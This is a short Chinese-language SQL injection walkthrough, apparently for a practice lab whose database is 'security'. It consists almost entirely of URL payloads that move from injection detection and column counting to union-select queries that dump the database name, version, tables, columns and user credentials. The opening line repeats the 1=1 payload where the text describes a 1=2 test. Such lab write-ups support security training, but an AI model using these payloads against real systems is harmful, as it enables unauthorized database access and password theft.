?id=1'and 1=1 and '1'='1和?id=1'and 1=1 and '1'='1进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为字符型注入。
根据报错信息判断为单引号带括号注入
联合查询:
猜解列名
?id=1') order by 3--+
判断回显点
?id=-1') union select 1,2,3--+
爆库、版本号、权限
?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,user()--+
爆表、爆列
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
爆账号密码
?id=-1') union select 1,2,(select group_concat(username,password))from users